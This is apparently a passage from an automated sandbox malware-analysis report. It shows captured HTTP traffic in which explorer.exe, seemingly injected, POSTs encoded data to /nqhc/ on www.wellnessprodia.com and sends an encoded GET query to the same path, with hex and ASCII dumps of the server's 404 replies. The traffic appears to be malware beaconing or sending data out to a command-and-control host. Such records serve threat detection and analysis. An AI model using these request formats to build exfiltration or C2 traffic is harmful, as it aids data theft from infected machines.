                                                                                                                                                                                    Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    53192.168.11.2049878192.232.217.12580C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:23:11.907891035 CET1503OUTPOST /nqhc/ HTTP/1.1
                                                                                                                                                                                    Host: www.wellnessprodia.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 51815
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Origin: http://www.wellnessprodia.com
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Referer: http://www.wellnessprodia.com/nqhc/
                                                                                                                                                                                    Accept-Language: en-US
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    Data Raw: 72 34 74 78 42 3d 52 41 6f 2d 6a 64 53 6e 68 68 6a 4b 53 48 65 33 77 6a 51 61 63 49 78 6d 69 5f 53 71 64 37 32 53 76 30 33 68 28 52 46 2d 71 79 67 61 6a 31 6f 71 45 44 68 33 30 48 43 62 6e 4c 6b 48 6c 76 54 56 34 6e 61 6c 6d 66 4a 64 6a 44 30 61 78 4c 77 75 7e 70 47 42 4e 4f 6d 45 63 32 6b 43 79 68 78 44 47 42 34 39 5a 79 79 44 42 4b 75 42 7e 34 42 75 44 37 72 72 69 34 47 62 45 4c 57 7a 33 4c 66 33 51 46 4d 6c 6f 50 78 48 75 42 73 36 78 70 45 59 33 52 7e 37 47 58 37 47 78 68 38 37 44 62 42 67 61 4a 65 5f 6b 38 54 67 50 36 35 48 6f 32 38 62 58 70 7a 4c 56 37 38 63 43 59 34 54 28 49 70 76 79 71 4d 39 47 67 30 41 46 4a 55 75 66 56 6b 36 73 38 28 50 5a 32 45 39 6f 43 6b 30 45 74 61 59 7e 79 4c 66 6f 4e 34 6f 7e 4c 78 7a 35 67 41 4b 52 4c 49 62 4c 43 4c 79 7a 4b 52 2d 4b 65 32 6e 64 5f 41 2d 75 7a 7a 55 6c 4e 31 37 42 41 39 56 5a 5a 6b 38 31 65 51 5f 62 6b 44 6f 7a 37 47 34 6a 30 4a 4f 6e 74 77 6c 6d 74 6a 41 71 6d 76 65 53 43 67 67 7a 6c 4a 42 6e 54 69 58 68 32 42 6b 65 69 43 44 53 44 39 6f 33 7a 6d 56 57 6e 42 42 57 6f 7a 46 35 67 77 4b 4a 47 74 57 65 57 63 5f 4d 5a 35 5f 6d 73 71 65 6f 4c 79 73 68 4d 7a 56 4e 62 54 45 73 37 58 41 63 41 70 6c 6c 4d 49 52 78 32 44 52 32 5f 72 47 75 62 72 31 6d 36 5a 6c 66 4b 4c 74 36 4b 72 55 58 67 66 33 6b 73 44 44 6a 62 71 68 68 47 72 36 47 58 67 46 54 6f 64 6c 47 4a 6f 79 77 59 68 2d 4a 63 6e 49 4a 62 72 6a 58 6b 4f 53 4b 64 4d 4b 6a 32 43 48 70 4a 4a 4f 70 36 56 5a 71 63 33 75 56 39 4d 59 65 5a 39 6b 33 6c 36 64 75 62 50 51 73 4b 75 58 74 4f 78 77 6f 35 33 78 69 42 54 62 7e 55 30 4e 74 49 61 65 6c 4a 72 32 5a 5f 42 78 43 6c 54 5f 53 77 7a 50 30 45 4a 72 55 48 51 59 4c 32 4b 30 59 6e 61 76 6b 73 49 4a 7a 44 4b 72 76 53 55 50 68 4e 64 64 70 74 6c 72 39 77 77 4b 35 53 61 6a 7a 76 6c 66 57 77 63 66 74 48 59 62 51 6d 68 70 4d 74 57 73 38 2d 28 4a 28 6f 4d 79 74 77 55 4f 6e 53 67 55 71 65 61 49 58 30 73 49 79 4f 35 2d 44 6c 6b 41 72 70 61 46 6d 74 6d 5f 70 42 63 73 7e 45 74 30 6d 78 33 51 39 69 45 42 53 5a 47 72 32 64 34 4c 77 32 64 71 6a 47 47 4b 66 4a 44 54 66 5f 38 4d 6b 79 77 4f 70 50 6c 4a 32 43 31 56 41 75 42 49 66 68 56 59 33 68 68 52 57 52 76 57 4d 47 32 56 32 32 65 4a 79 43 72 66 36 30 45 38 69 65 7a 49 31 38 6e 52 38 52 6a 74 6d 77 4e 7a 28 48 6d 52 7a 47 5a 48 51 47 4d 33 48 4c 6a 4b 70 46 6b 36 68 37 45 75 73 59 6b 66 6e 79 71 53 52 6c 37 4f 34 54 62 39 66 6d 67 59 39 57 42 5a 69 44 68 57 7a 49 6c 70 62 53 58 50 75 4e 66 2d 6a 6d 6b 38 50 38 6d 58 44 55 4a 30 47 48 4e 56 43 53 4f 32 65 34 32 54 6d 4a 76 6f 67 37 34 33 50 56 33 6a 62 4c 67 74 55 4b 6c 31 56 64 68 30 42 5f 44 34 32 76 4d 77 4f 49 64 7a 79 6f 44 44 69 39 6d 4f 41 71 62 59 47 59 70 4d 6c 4f 49 4b 4d 6a 37 66 68 59 34 75 47 65 4a 34 34 38 63 61 70 56 72 63 71 48 7a 39 7a 41 37 77 64 4a 39 4a 34 6c 64 47 54 58 50 77 42 44 6a 74 54 66 4f 55 4e 6d 77 43 76 41 54 35 4a 65 39 78 30 45 47 6c 6d 47 61 37 61 48 45 71 57 4c 4f 6d 6d 6e 6e 62 66 50 6b 51 61 4d 4e 36 36 57 63 74 4a 38 49 2d 73 56 7a 4c 53 64 31 51 31 51 68 69 45 30 76 2d 51 5f 6f 47 38 37 4b 72 35 58 70 43 6c 6b 48 4d 45 66 75 4e 38 6e 44 38 51 77 35 44 73 6f 6a 4d 63 6d 6a 67 43 43 5a 4d 6f 49 50 4d 79 78 33 53 55 73 39 6f 76 4a 45 65 73 34 63 6c 76 57 70 32 76 47 31 2d 45 4e 39 6a 4a 6c 50 66 35 57 54 69 53 79 59 77 6d 6a 48 71 70 6e 7a 49 44 54 51 6d 42 43 33 53 73 55 30 38 47 41 39 35 69 76 5a 2d 42 46 33 6d 38 58 71 57 7e 33 6f 4b 75 55 64 44 74 65 72 41 55 41 6e 69 59 6b 64 31 39 63 43 4d 39 47 33 48 6b 6f 55 4f 59 75 75 67 6f 57 70 6a 62 4a 35 56 38 53 66 54 48 63 63 6f 4b 47 6c 67 33 47 36 6b 37 43 39 53 52 76 74 6b 52 4b 50 32 41 31 59 69 64 30 6e 61 6e 4d 4d 51 4e 64 55 74 53 55 30 4d 44 58 4c 6f 6f 71 6b 59 51 79 36 6b 4f 44 33 67 32 55 57 72 38 43 32 61 63 75 50 49 47 67 79 4e 78 79 65 33 32 49 68 2d 35 79 57 6b 63 62 74 78 42 42 38 69 57 7a 41 4e 4e 6d 68 33 59 64 54 6f 31 57 44 73 76 68 77 67 4a 47 63 6d 36 72 39 5f 31 62 28 31 71 69 7a 7a 4f 59 34 45 4c 39 79 30 75 66 36 4c 34 35 72 79 66 38 58 5f 67 42 7a 79 79 62 4b 33 41 51 5a 55 66 4e 66 39 7a 72 4e 57 34 53 64 57 72 71 47 46 6b 63 28 6f 53 74 6b 2d 43 66 62 50 72 69 52 68 68 62 56 4a 43
                                                                                                                                                                                    Data Ascii: r4txB=RAo-jdSnhhjKSHe3wjQacIxmi_Sqd72Sv03h(RF-qygaj1oqEDh30HCbnLkHlvTV4nalmfJdjD0axLwu~pGBNOmEc2kCyhxDGB49ZyyDBKuB~4BuD7rri4GbELWz3Lf3QFMloPxHuBs6xpEY3R~7GX7Gxh87DbBgaJe_k8TgP65Ho28bXpzLV78cCY4T(IpvyqM9Gg0AFJUufVk6s8(PZ2E9oCk0EtaY~yLfoN4o~Lxz5gAKRLIbLCLyzKR-Ke2nd_A-uzzUlN17BA9VZZk81eQ_bkDoz7G4j0JOntwlmtjAqmveSCggzlJBnTiXh2BkeiCDSD9o3zmVWnBBWozF5gwKJGtWeWc_MZ5_msqeoLyshMzVNbTEs7XAcApllMIRx2DR2_rGubr1m6ZlfKLt6KrUXgf3ksDDjbqhhGr6GXgFTodlGJoywYh-JcnIJbrjXkOSKdMKj2CHpJJOp6VZqc3uV9MYeZ9k3l6dubPQsKuXtOxwo53xiBTb~U0NtIaelJr2Z_BxClT_SwzP0EJrUHQYL2K0YnavksIJzDKrvSUPhNddptlr9wwK5SajzvlfWwcftHYbQmhpMtWs8-(J(oMytwUOnSgUqeaIX0sIyO5-DlkArpaFmtm_pBcs~Et0mx3Q9iEBSZGr2d4Lw2dqjGGKfJDTf_8MkywOpPlJ2C1VAuBIfhVY3hhRWRvWMG2V22eJyCrf60E8iezI18nR8RjtmwNz(HmRzGZHQGM3HLjKpFk6h7EusYkfnyqSRl7O4Tb9fmgY9WBZiDhWzIlpbSXPuNf-jmk8P8mXDUJ0GHNVCSO2e42TmJvog743PV3jbLgtUKl1Vdh0B_D42vMwOIdzyoDDi9mOAqbYGYpMlOIKMj7fhY4uGeJ448capVrcqHz9zA7wdJ9J4ldGTXPwBDjtTfOUNmwCvAT5Je9x0EGlmGa7aHEqWLOmmnnbfPkQaMN66WctJ8I-sVzLSd1Q1QhiE0v-Q_oG87Kr5XpClkHMEfuN8nD8Qw5DsojMcmjgCCZMoIPMyx3SUs9ovJEes4clvWp2vG1-EN9jJlPf5WTiSyYwmjHqpnzIDTQmBC3SsU08GA95ivZ-BF3m8XqW~3oKuUdDterAUAniYkd19cCM9G3HkoUOYuugoWpjbJ5V8SfTHccoKGlg3G6k7C9SRvtkRKP2A1Yid0nanMMQNdUtSU0MDXLooqkYQy6kOD3g2UWr8C2acuPIGgyNxye32Ih-5yWkcbtxBB8iWzANNmh3YdTo1WDsvhwgJGcm6r9_1b(1qizzOY4EL9y0uf6L45ryf8X_gBzyybK3AQZUfNf9zrNW4SdWrqGFkc(oStk-CfbPriRhhbVJC_jc5GUlAAIcYH7FTNh1gYHF~s7PIdihL-Z3Cv6x~n54ISVTFiKey_l2kXtugXURFlbACweHIyiuRcpBddNOOKy8vxv36s1yMIFc~95MeEjpMgv9YEmK3FTmYzRyXg8pdIgJ3wPAqo9gKKElKzkLUuhPBO2IH28huYPXWh3XRZjr7GVDaPrLTOea5zSFs4~KTQwVQo4wqwbqNv~1gZNZ9010mGHPDvo40WEyj2GFRZfs~1m5Aqy3KEQvRKeJaA698kbVnTSu8jDbO22eYl8T9xKuyjq9ESIFO_J3D6yc6aupDQm1~3lsnVtPuq7lZN24RPH41sYyj2JKiY2iOMLOtO5bDC05VFzVKgVj2opglg(CkQy0ynZENWdL~936Nw52~ZVD4gkGukUKtniVc9Tl6lremncSEMNtlDyWNiNcw1LdSdlfqHFQxB89c6Y4mJRgE47R208PWDfLEslb1TkzGi6jGucZ~ND0lsbPFRfZT_QYi7mETDMqJ-2QKqKQzmELGUHjrJ7b482BghNmKwu0icnORdqn(W(T(YK_be2I103bQidorGtU~HxEiZaDZFO8j4HJcCRwO7OE5OXyaTUK(Y1vdqo14GOutUP6w0rdT_ac1ndEdvE8ig6aEbzGWb1Ey22kHo6eOFe-l2W-fuqcy4TD0picIU6iEHf1apeWZ-Y2qoSCqPqnipJFaRlc7YC-2Ff8M4sY7q~TmwjntURMsvJJZjIaUu3_eGr7zZ6EdqcicRa9YIZJhdA9vz0mehWuKsrH3n2cMILpySDJseg6Z7GveovvVG
                                                                                                                                                                                    Nov 21, 2022 19:23:11.907933950 CET1508OUTData Raw: 38 34 37 44 66 4f 71 35 58 5f 70 68 67 6f 34 2d 7a 73 73 6e 4a 36 74 77 36 68 4a 43 53 57 38 39 4d 37 55 4b 76 72 6d 79 4e 6f 28 57 56 30 47 42 48 6b 51 6a 45 51 6a 2d 4c 56 62 36 67 38 49 33 49 65 28 53 4f 4d 6c 4c 70 6f 72 6a 70 6a 5a 67 6f 79
                                                                                                                                                                                    Data Ascii: 847DfOq5X_phgo4-zssnJ6tw6hJCSW89M7UKvrmyNo(WV0GBHkQjEQj-LVb6g8I3Ie(SOMlLporjpjZgoyIgFMWkkPY5qr1MzFtv5a8AiRolZkcUYcME3R7ama0VIqEkGl5qksdR(CRbFHF8jdH7B4BWPdm9rGM5IcK-B4S7wtFkly~_PvsVPH1mfIPSFbtgzFgk12umPnRuJtO-tIj4QaQEjw6a~dYPN-BRq4ordG2TuRt3z9i
                                                                                                                                                                                    Nov 21, 2022 19:23:11.907977104 CET1513OUTData Raw: 35 35 65 4c 46 43 41 42 41 66 4f 6d 44 44 38 78 79 68 63 5a 43 7a 72 2d 52 48 41 74 75 38 46 6e 44 74 44 41 41 4d 79 54 37 33 73 4d 76 46 65 4a 68 79 56 78 36 2d 4b 38 34 5f 75 53 73 32 64 56 4d 65 38 4a 74 6e 39 52 58 46 4c 57 4e 6d 5a 38 64 46
                                                                                                                                                                                    Data Ascii: 55eLFCABAfOmDD8xyhcZCzr-RHAtu8FnDtDAAMyT73sMvFeJhyVx6-K84_uSs2dVMe8Jtn9RXFLWNmZ8dFBxfrs8WnxYGrlMA-IafDSGwHpAkSvJlyuMn8PM0nZONo13nPuuDVAMNyAhStUqbRLWiTx86zY2DcE8IQVV1Nf0P84y4E7i32Ufwvv4JyzIVxd1Bq6A8dsQTNl7IzVhk8ygwAm9GBDb2vhEeu8T4Sm_4o4u5BfwU-8
                                                                                                                                                                                    Nov 21, 2022 19:23:12.067307949 CET1515OUTData Raw: 7a 68 44 57 68 35 4f 68 48 37 5a 70 39 72 75 79 41 7a 61 6d 79 36 76 53 70 69 54 62 6e 6c 52 33 4f 68 63 50 65 54 63 41 63 56 54 4c 6e 45 6f 61 49 72 64 4e 66 57 61 31 6f 32 4f 44 32 45 64 76 31 44 58 6c 56 34 6b 4f 32 5f 31 48 4b 39 73 63 6c 78
                                                                                                                                                                                    Data Ascii: zhDWh5OhH7Zp9ruyAzamy6vSpiTbnlR3OhcPeTcAcVTLnEoaIrdNfWa1o2OD2Edv1DXlV4kO2_1HK9sclxhWyrUCTXzzRm2sJNaj~G7LozL-eXhjMe4L166KoQ84zgtOX5pmYpyDi7k23RCDvy8EX8IP0DCN1XlZOCkWDBQbYzWIiDwS5Ee8S3KMcPk3BPoadgvQGThkQQZkJDv_leIxnuN3AwQtlSI2gGQee46XUxRRnCNxSnr
                                                                                                                                                                                    Nov 21, 2022 19:23:12.067368984 CET1516OUTData Raw: 7e 76 71 73 65 4c 42 62 74 6d 74 6a 4b 4a 4e 7a 28 58 59 75 7e 50 31 66 6a 4d 5a 72 65 56 78 36 73 31 65 47 39 47 53 4f 68 67 66 6b 6e 4c 69 33 33 4f 57 69 59 46 77 63 5a 68 6a 72 50 64 34 4e 6e 41 71 70 38 31 69 53 57 4c 67 72 6f 39 38 43 6e 61
                                                                                                                                                                                    Data Ascii: ~vqseLBbtmtjKJNz(XYu~P1fjMZreVx6s1eG9GSOhgfknLi33OWiYFwcZhjrPd4NnAqp81iSWLgro98Cna6GiB8sERg2ieH410ZyMJtc54wRESU5YWMpWASxb8MzLKlFVpeha932bVNrNCdpmen7hSPCyRgV(HFIJAYbPM4zHjA3KepPyguZnQri2sSGXv0vxo6S676nmlEA71g3ipRvlMk6Txwsf1CsHFxeT5d_G_yb7epDh1~
                                                                                                                                                                                    Nov 21, 2022 19:23:12.067428112 CET1519OUTData Raw: 52 58 48 4b 5a 61 44 43 70 53 55 61 52 53 37 67 7a 69 67 57 6a 44 62 78 6b 36 32 39 52 58 54 41 46 52 61 64 72 50 4f 33 61 6b 54 53 5a 51 7a 64 56 72 65 44 37 79 44 57 45 36 78 35 36 54 76 6b 6f 75 4e 31 39 38 50 57 7a 54 78 6b 7a 50 73 51 59 75
                                                                                                                                                                                    Data Ascii: RXHKZaDCpSUaRS7gzigWjDbxk629RXTAFRadrPO3akTSZQzdVreD7yDWE6x56TvkouN198PWzTxkzPsQYuJVjDOR(6otjNN8gzjek0JZz8j-Au97FfgdaumFiaptsfrZ3oVknSR9gKhx7sfE(7DV0LOOJF3XWLSaDd1_g4O8NWZ9Wgc91PACh41GqTyoSyPKZj6t3Wku~5hu9xdyXsMOza7csKjxw_HMdxf_tsVTw_qxHkwWHo3
                                                                                                                                                                                    Nov 21, 2022 19:23:12.067761898 CET1524OUTData Raw: 65 62 6d 77 6f 2d 41 36 33 31 31 43 56 52 57 67 6e 50 4e 48 39 53 6e 65 4c 6f 33 30 33 47 45 74 72 56 55 38 62 45 45 59 71 63 43 47 76 4d 6c 4c 59 35 54 51 4f 63 47 42 58 68 72 44 6e 4c 4e 4e 53 61 74 35 70 46 54 66 63 6f 70 72 6b 65 51 6e 6b 4e
                                                                                                                                                                                    Data Ascii: ebmwo-A6311CVRWgnPNH9SneLo303GEtrVU8bEEYqcCGvMlLY5TQOcGBXhrDnLNNSat5pFTfcoprkeQnkNZvFbMjyxwlpXbWcc9kO8(3Kh5K19c3AyDs94SXpiZkepJsLGx0EwFbLW9g0vjCIo57e6Ntm-poNT2pvnp549s9IAQ93Wvs9giqpI1sA3uLCaCfdsRLFNFD7d7CvyfGSoBus2voQN7ekpRPxwQ3TfK89UfGhmh6phW
                                                                                                                                                                                    Nov 21, 2022 19:23:12.067847013 CET1525OUTData Raw: 53 39 65 74 73 47 62 67 4e 5a 4f 33 38 61 77 48 28 76 37 42 53 61 57 34 4a 74 56 53 4a 4d 71 77 5a 73 66 79 47 41 66 52 35 30 79 63 77 79 63 37 77 57 75 43 5a 4d 4f 47 59 73 74 44 77 78 4b 47 77 73 72 47 7e 46 63 76 77 58 4a 31 50 67 4d 75 61 36
                                                                                                                                                                                    Data Ascii: S9etsGbgNZO38awH(v7BSaW4JtVSJMqwZsfyGAfR50ycwyc7wWuCZMOGYstDwxKGwsrG~FcvwXJ1PgMua6ofd-(mWffy0W(5SXIYc69PiEQGmrLravjwbnipSjXSPyHsJ_PoIzjRhAOeN28Zow8Zj5VP1tFTsg~I1NIxASF_zsJedymKJDm4~9ICqI6dVyBPHPq5REo32easvin4gqr-18WpUO6v38APexfXqdpCHzyM6LV8t5R
                                                                                                                                                                                    Nov 21, 2022 19:23:12.067914009 CET1532OUTData Raw: 61 6e 52 74 4d 6e 39 47 64 39 6c 36 6c 45 72 6a 77 37 39 77 6d 44 30 78 51 6c 50 74 46 4c 43 6f 43 39 4a 67 36 47 61 6c 4d 78 65 56 54 7a 38 34 67 6e 4d 36 70 61 32 6f 55 6f 6a 44 79 6b 68 4d 43 67 35 37 79 75 43 6a 34 31 7e 39 36 75 72 6f 62 6c
                                                                                                                                                                                    Data Ascii: anRtMn9Gd9l6lErjw79wmD0xQlPtFLCoC9Jg6GalMxeVTz84gnM6pa2oUojDykhMCg57yuCj41~96urobl2cqNlwt-Hq2tJu0KBzOyRFXUyQUttLd0RuBJyHsPehwf2-iPjKh7VDVgMSYd6BYb87n6pIDC6lHw~xSiMs8GHSyZM_wLeOPGSg4DMpuzLv4IV0qpre62BFhWZ8wR4oUUr_oAlwDpsw2BjtOdJPz19bgFwVracG(wa
                                                                                                                                                                                    Nov 21, 2022 19:23:12.067991018 CET1534OUTData Raw: 75 30 4e 62 41 68 45 35 52 45 7a 68 67 61 67 66 33 49 4f 4b 34 58 57 4e 33 61 5a 66 4b 37 38 70 54 6a 59 52 46 65 28 4a 72 6a 46 75 5a 6b 28 4a 74 32 6b 72 6e 38 37 45 66 75 44 35 36 53 31 36 46 42 66 59 76 45 33 50 45 34 5a 69 39 56 6e 75 6b 47
                                                                                                                                                                                    Data Ascii: u0NbAhE5REzhgagf3IOK4XWN3aZfK78pTjYRFe(JrjFuZk(Jt2krn87EfuD56S16FBfYvE3PE4Zi9VnukGHLkZlGmqHypPn32x2JRVwRUUgs(Lb3MtQ_jitjUkrt8LSmgou6DL3trTfw~r~DJHiv6YxLuQ2R84sXCt3eV_y0DFltMDCS87haEaJy0u37cDEsFM6nGd6f2thR3FMMYzKtREvKmwzhDJNqweK1XLdOKWMVYZbtCD8
                                                                                                                                                                                    Nov 21, 2022 19:23:12.068228006 CET1539OUTData Raw: 34 50 6c 44 6b 72 41 73 48 75 75 52 79 36 46 6f 28 38 77 42 69 42 45 78 7e 42 65 49 58 77 72 49 30 51 28 4e 56 7a 63 6e 6b 68 69 2d 42 53 39 69 44 76 53 4c 57 33 6c 4d 77 49 74 74 55 58 71 4d 6f 61 55 5f 44 61 41 59 52 5a 4b 6d 65 44 48 5f 34 51
                                                                                                                                                                                    Data Ascii: 4PlDkrAsHuuRy6Fo(8wBiBEx~BeIXwrI0Q(NVzcnkhi-BS9iDvSLW3lMwIttUXqMoaU_DaAYRZKmeDH_4QLFWTmPcG62T9NIV0Cg(mLKJBlSU9IW6emNUSA-NSrW7pvj7qvd042VK2AKjJ7wBNGKwZqsn_Itlpvud63izLwePM2dNVbP6nGDQx1-Psny(kqBBRJzUY2zfy0XLU2jZi56GYuQqmK7ciZHkYYeAzHU~mNBugnV~4P
                                                                                                                                                                                    Nov 21, 2022 19:23:12.390628099 CET1555INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:23:11 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                                                    Last-Modified: Fri, 01 May 2020 23:50:34 GMT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                    Content-Length: 462
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Data Raw: 1f 8b 08 00 00 00 00 00 00 03 5d 92 4d 8f d3 30 10 86 ef fd 15 43 38 00 52 dd 8f a5 0b 28 1f 15 17 e0 82 d0 6a 57 70 9f c4 d3 c4 c2 f1 04 7b da a6 ac f6 bf 6f 9c b4 cb b2 f2 c1 f2 78 de 77 9e 19 3b 7f a5 b9 92 53 47 d0 48 6b b7 b3 3c 6e 60 d1 d5 45 42 2e 89 01 42 bd 9d 01 e4 2d 09 42 d5 a0 0f 24 45 b2 97 9d fa 94 fc bb 68 44 3a 45 7f f6 e6 50 24 bd da a3 aa b8 ed 50 4c 69 29 81 8a 9d 90 1b 54 86 0a d2 35 4d 3a 31 62 69 bb 59 6d e0 8b f7 ec f3 e5 14 78 b2 74 d8 52 91 1c 0c 1d 3b f6 f2 cc e5 68 b4 34 85 a6 83 a9 48 8d 87 39 18 67 c4 a0 55 a1 42 4b c5 3a 79 69 e3 b9 64 09 cf 4c 1c 1b a7 a9 9f 83 e3 1d 5b cb c7 49 12 e4 34 31 00 7c 6e 49 1b 84 50 79 22 07 e8 34 bc 6d b1 9f 0a a6 d7 ab 55 d7 bf 83 fb 31 13 a0 64 7d 82 7b d8 0d ee 2a 98 bf 94 c2 e2 03 b5 19 3c c0 98 f0 10 ad 97 67 ef 7c 39 cd 74 96 8f aa 31 5a 24 42 bd 28 b4 a6 76 29 54 03 21 f9 6c 20 8a ba 66 7d c9 19 ed 77 d8 1a 7b 4a e1 1b b1 af 0d ce 21 90 37 bb 6c e8 cc b2 4f e1 f5 06 e3 ca a0 c5 e1 da 29 e1 2e 85 4d 64 b1 c6 91 6a c8 d4 8d a4 b0 5e 5c 67 c9 d4 e7 1d 7b 7f 9a 83 34 26 40 87 35 81 66 0a ee 8d 00 f5 26 c8 22 2f fd f6 c6 12 06 1a 5e 9f aa df 43 22 c1 cf db ef c0 1e 6a 86 12 87 10 8e c2 c5 d8 65 b3 8e b6 23 f8 d5 05 1c e0 3f f4 5f e4 35 ba 88 8e 2e a8 17 fc 1f 75 5c d9 a4 38 9e 71 df af 56 17 dc a7 0f b3 80 9b 48 fb 83 05 be f2 de e9 73 f9 ab b1 7c be 8c c3 8d 43 5e 4e 3f fb 11 21 b9 04 0e ea 02 00 00
                                                                                                                                                                                    Data Ascii: ]M0C8R(jWp{oxw;SGHk<n`EB.B-B$EhD:EP$PLi)T5M:1biYmxtR;h4H9gUBK:yidL[I41|nIPy"4mU1d}{*<g|9t1Z$B(v)T!l f}w{J!7lO).Mdj^\g{4&@5f&"/^C"je#?_5.u\8qVHs|C^N?!


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    54192.168.11.2049879192.232.217.12580C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    Nov 21, 2022 19:23:14.096967936 CET1555OUTGET /nqhc/?r4txB=cCAegqK/nzfcR22oyFZFZLhv7+fwUp6Akkv27RFimicapgMUJBRfpG+MwKY/yKfw/XeAmq4HqwYY5KwMyaSJSZOUIGIe3VRiGA==&1b=S8jD HTTP/1.1
                                                                                                                                                                                    Host: www.wellnessprodia.com
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    Nov 21, 2022 19:23:14.270143032 CET1556INHTTP/1.1 404 Not Found
                                                                                                                                                                                    Date: Mon, 21 Nov 2022 18:23:14 GMT
                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                    Upgrade: h2,h2c
                                                                                                                                                                                    Connection: Upgrade, close
                                                                                                                                                                                    Last-Modified: Fri, 01 May 2020 23:50:34 GMT
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Content-Length: 746
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 35 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 36 65 6d 3b 20 7d 20 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 0a 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 47 65 6f 72 67 69 61 2c 20 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 34 61 34 61 34 61 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 65 6d 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 35 3b 22 3e 0a 20 20 20 20 53 6f 72 72 79 2c 20 74 68 69 73 20 70 61 67 65 20 64 6f 65 73 6e 27 74 20 65 78 69 73 74 2e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 65 20 55 52 4c 20 6f 72 20 67 6f 20 62 61 63 6b 20 61 20 70 61 67 65 2e 0a 20 20 3c 2f 68 31 3e 0a 20 20 0a 20 20 3c 68 32 20 73 74 79 6c 65 3d 22 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 63 6f 6c 6f 72 3a 20 23 37 64 37 64 37 64 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 22 3e 0a 20 20 20 20 34 30 34 20 45 72 72 6f 72 2e 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 0a 20 20 3c 2f 68 32 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a
